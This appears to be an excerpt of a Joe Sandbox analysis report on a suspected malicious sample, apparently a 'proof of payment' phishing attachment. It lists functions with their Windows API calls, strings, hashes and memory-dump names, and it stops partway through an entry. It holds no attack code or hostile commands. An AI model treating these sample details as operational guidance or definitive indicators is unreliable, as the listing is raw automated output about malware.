Instruction ID: dad9eaa369fa706004491149f70e53a6c4aeed03237acc60217cc0f4af7340f6
Opcode Fuzzy Hash: 533a52dca4e348288ee2e79bf8f227e4d8032344d62fc6c987fbec62b837f692
Instruction Fuzzy Hash: 8A2192B5A00249AFEB11DF68CC91DB737EDEF4A354B050059FA449B291CB35EC519B60

Function 010199A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01019A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01019A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01019A65

Strings

Listbox, xrefs: 010199FD

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 278147fc07c17fbd14de936eff5a89eece147a51a1d61ea3426e38d9c0143f18
Instruction ID: 4be023c0e55ee208bea9b9054a6281de7e52df7d6e2a4f22d20cf6201a7f3599
Opcode Fuzzy Hash: 278147fc07c17fbd14de936eff5a89eece147a51a1d61ea3426e38d9c0143f18
Instruction Fuzzy Hash: 6821C232610119BFEF228F58CC95FBF3BAEEF89754F018124F9949B195C6799C1187A0

Function 0101A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0101A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0101A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0101A48F

Strings

msctls_trackbar32, xrefs: 0101A444

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 02eacc727cda4896cbba121e050e830206422e4ee309bccb07ad3c5c27ecc173
Instruction ID: d88e7c324349b6bbb8aee076f80d98ff3520c48349153df4251cd341b9c27c84
Opcode Fuzzy Hash: 02eacc727cda4896cbba121e050e830206422e4ee309bccb07ad3c5c27ecc173
Instruction Fuzzy Hash: 3011E771240248BFEF215E65CC45FEB3BA9EFC9754F014118FA95A7091D67AE411D720

Function 00FD2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FD2350,?), ref: 00FD22A1
GetProcAddress.KERNEL32(00000000), ref: 00FD22A8

Strings

RoInitialize, xrefs: 00FD2290
combase.dll, xrefs: 00FD229C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: afe7f2ed210ec94aa4e0542810e5173bfcf026ef4821abaf5ec39e58205b3771
Instruction ID: 8896a4bef28316b90e345cfa2686d2fff78bdb988a4e91dab6e995ef6042bffd
Opcode Fuzzy Hash: afe7f2ed210ec94aa4e0542810e5173bfcf026ef4821abaf5ec39e58205b3771
Instruction Fuzzy Hash: 02E01A70E94300ABEB706FB1ED49B183669A751712F404124F1C2E619CCBBE4051EF44

Function 00FD235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FD2276), ref: 00FD2376
GetProcAddress.KERNEL32(00000000), ref: 00FD237D

Strings

RoUninitialize, xrefs: 00FD2365
combase.dll, xrefs: 00FD2371

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: a5b2fcabb77b6b8922048990e6fa95274905c7c4abc34398ea6d711c567b0a1c
Instruction ID: 3ef028dc28470745ef422b593df99966580add3c491b8bb84a04f07e6906f57d
Opcode Fuzzy Hash: a5b2fcabb77b6b8922048990e6fa95274905c7c4abc34398ea6d711c567b0a1c
Instruction Fuzzy Hash: E6E0BD70A88340EBEB706FA1FD0DB053A69B721712F500528F1C9F61ACCBBF9410AB54

Function 0102AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0102AC60
__swprintf.LIBCMT ref: 0102AC94

Strings

WIN_XPe, xrefs: 0102ACD3
%.3d, xrefs: 0102AC6E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: e55400bf1fc610c4237af17d668eebe8eebede04775d2c442c085c22f484d348
Instruction ID: dd89f77fe147ce00ad3ebc9ff9f6c74304e8a3b9709ed7ef9ecb24283fa5949c
Opcode Fuzzy Hash: e55400bf1fc610c4237af17d668eebe8eebede04775d2c442c085c22f484d348
Instruction Fuzzy Hash: 08E0127190462DEBCB119B90CD05DFD737DAB04741F5404D3F98AE3904DA399B949B21

Function 00FB42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00FB42EC,?,00FB42AA,?), ref: 00FB4304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00FB4310
kernel32.dll, xrefs: 00FB42FF

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 85893691c5be9933176900bc5d84e2d0574c90d597985c2f6d8195c314fa5e5b
Instruction ID: 05df6d50088a98800da6e9fc4b70dd2cd6230c775005bacdb5feb5709187dca4
Opcode Fuzzy Hash: 85893691c5be9933176900bc5d84e2d0574c90d597985c2f6d8195c314fa5e5b
Instruction Fuzzy Hash: 60D0A730800712BFC7304F62E80C64276DCAB04311B08442EE4C5D2115D775DC809F50

Function 01012205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,010121FB,?,010123EF), ref: 01012213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 01012225

Strings

GetProcessId, xrefs: 0101221F
kernel32.dll, xrefs: 0101220E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: b6b0f9ec9cfe6f08d9d74fef87b26c7fcd7571866ec7800c6b9ba50da61df0aa
Instruction ID: d8989c54bebf02ca1292b76a30b86fece3a3edf4555a28000a969cadfe6616d6
Opcode Fuzzy Hash: b6b0f9ec9cfe6f08d9d74fef87b26c7fcd7571866ec7800c6b9ba50da61df0aa
Instruction Fuzzy Hash: 2DD0A734400712FFD7314F75F80864576DCEB04204B10446EE8C1E2104D779D4808750

Function 00FB434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00FB41BB,00FB4341,?,00FB422F,?,00FB41BB,?,?,?,?,00FB39FE,?,00000001), ref: 00FB4359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00FB4365
kernel32.dll, xrefs: 00FB4354

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 4f75dc987b7b9555f2269325e019289b6582cb8d71f9e083b716986ee9668356
Instruction ID: 28f3146ce96c3944bae608bcfd5b02ba1cd05455bedba0d59c7111d4ff10ac56
Opcode Fuzzy Hash: 4f75dc987b7b9555f2269325e019289b6582cb8d71f9e083b716986ee9668356
Instruction Fuzzy Hash: A0D0A730800722AFC7304F72E808A4176DCAB10725B08442EE4C5D2100D774E8809F90

Function 00FF0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00FF052F,?,00FF06D7), ref: 00FF0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00FF0584

Strings

oleaut32.dll, xrefs: 00FF056D
UnRegisterTypeLibForUser, xrefs: 00FF057E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: ad04272f5a339700a919dcc6a9b0864d1c95a56033aac6b001892ccc144b9288
Instruction ID: 6ba23737bfba2c17c3e8112540d626e333c4d41761ce320ee51f8bf0eca8d904
Opcode Fuzzy Hash: ad04272f5a339700a919dcc6a9b0864d1c95a56033aac6b001892ccc144b9288
Instruction Fuzzy Hash: 4ED0A930800322AFC7305FB2E808F12BBECAF04321B58842EE9C1D2214EBF4C8C48B60

Function 00FF0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00FF051D,?,00FF05FE), ref: 00FF0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00FF0559

Strings

RegisterTypeLibForUser, xrefs: 00FF0553
oleaut32.dll, xrefs: 00FF0542

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: c3772fe608a35c4050cb2627433d474ac71c8d86c4a3567a915ed427573638e6
Instruction ID: 90a5db6e482e6e903932666a91ea29a0ba7d1aa9c53965021f9ca584160cf7ad
Opcode Fuzzy Hash: c3772fe608a35c4050cb2627433d474ac71c8d86c4a3567a915ed427573638e6
Instruction Fuzzy Hash: F3D0A730800712AFC7308F61E40861176DCAF00311B58C42DF4C6D2115DBF4C8808B50

Function 0100ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0100ECBE,?,0100EBBB), ref: 0100ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100ECE8

Strings

kernel32.dll, xrefs: 0100ECD1
GetSystemWow64DirectoryW, xrefs: 0100ECE2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 705907ee5b9222c6a06401a266b3acc2afd890aaa8bed48e1316c391869c5961
Instruction ID: 2af3b6a48f8d84278468422d37baee7042cea7f71d517b06eece4aa246fc1079
Opcode Fuzzy Hash: 705907ee5b9222c6a06401a266b3acc2afd890aaa8bed48e1316c391869c5961
Instruction Fuzzy Hash: ADD0A730401723EFEB315FA5E848A027BECAB00200F04887EF8C5E2141DF75C4809750

Function 01013BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,01013BD1,?,01013E06), ref: 01013BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01013BFB

Strings

advapi32.dll, xrefs: 01013BE4
RegDeleteKeyExW, xrefs: 01013BF5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: f63b641cfa8c222c32bd7c0661922707d90bc1a7a5c926450d1a9ccd7a65b6cb
Instruction ID: f66b384d6c3cfac183a63a3abeda8d5c88b98780756d5417a744d72486aec4e4
Opcode Fuzzy Hash: f63b641cfa8c222c32bd7c0661922707d90bc1a7a5c926450d1a9ccd7a65b6cb
Instruction Fuzzy Hash: DAD0C774500756EFD7745FA6E418643FEFCBB04625B10445DF4D6E6104D7B8D4808F51

Function 0100BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0100BAD3,00000001,0100B6EE,?,0104DC00), ref: 0100BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0100BAFD

Strings

kernel32.dll, xrefs: 0100BAE6
GetModuleHandleExW, xrefs: 0100BAF7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 7fb6300223c2eb820a9b5b669df3162728a3f8366de7e1eace9f10055e29cadc
Instruction ID: ea13c8d1f0e6012d2d9e66470f2a54673d3d193d0df98d7906e4cfb454ebe849
Opcode Fuzzy Hash: 7fb6300223c2eb820a9b5b669df3162728a3f8366de7e1eace9f10055e29cadc
Instruction Fuzzy Hash: 0CD0A734810B12AFE7316F65E848B1277DCAB00200F00446EF8C3D2144D7B4C480C750

Function 00FE9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8377b52d41a8f86cfefc6eeeb84a3b4e51931eba0b1c1a6478c6ea49b2b2666a
Instruction ID: 890f2c4b991c02b541aa63cf7649418f2d08ec3a50de3b1121298c678ff8f5c0
Opcode Fuzzy Hash: 8377b52d41a8f86cfefc6eeeb84a3b4e51931eba0b1c1a6478c6ea49b2b2666a
Instruction Fuzzy Hash: E5C19D71E0425AEFCB14DF95C884AAEB7B5FF48710F204598E905EB291D7B0DE41EBA0

Function 0100AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0100AAB4
CoUninitialize.OLE32 ref: 0100AABF

Part of subcall function 00FF0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FF027B

VariantInit.OLEAUT32(?), ref: 0100AACA
VariantClear.OLEAUT32(?), ref: 0100AD9D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: f23da86392f2e939a7c938ce64a87f35474d62d3f08b8fd2c0d188b96f4451b7
Instruction ID: 4815670f758907310a40f8901ae2c3a50625890826f314a5e07a1ff3b38fef0d
Opcode Fuzzy Hash: f23da86392f2e939a7c938ce64a87f35474d62d3f08b8fd2c0d188b96f4451b7
Instruction Fuzzy Hash: A9A12735208701DFEB11EF15C881B5AB7E5BF89710F084849FA969B3A2CB74E904DB85

Function 00FE91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FE91DD
SysAllocString.OLEAUT32(?), ref: 00FE9286
VariantCopy.OLEAUT32 ref: 00FE92B5
VariantClear.OLEAUT32(?), ref: 00FE92DC

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: aec250b10805b133ddb64b2104ae931a69723fbfbf8e5a2ed8c57159e1d09a16
Instruction ID: 9236891f7d92a6419ac18373de449c8abb0405ddb8e4d7587cd471b00f57bcdf
Opcode Fuzzy Hash: aec250b10805b133ddb64b2104ae931a69723fbfbf8e5a2ed8c57159e1d09a16
Instruction Fuzzy Hash: EE51B631A083469FDB249F67D891B6EB3E9EF45310F30882FE556CB2D1DBB49840A721

Function 0101C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(009F77B8,?), ref: 0101C544
ScreenToClient.USER32(?,00000002), ref: 0101C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0101C5DA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: e3d6d0faff8956b1c63e6c2c745decc36c995332a646bb278adfd99b18f92b36
Instruction ID: e3ba8b606899a83b5c934d5a7235c84f50b59a2ba16cc13b2d8ec823d5a1d533
Opcode Fuzzy Hash: e3d6d0faff8956b1c63e6c2c745decc36c995332a646bb278adfd99b18f92b36
Instruction Fuzzy Hash: D0517375900205EFDF21DF68C9809AE7BF5FF49320F108699F9A597289D738E981CB90

Function 00FEC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FEC462
__itow.LIBCMT ref: 00FEC49C

Part of subcall function 00FEC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FEC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FEC505
__itow.LIBCMT ref: 00FEC55A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
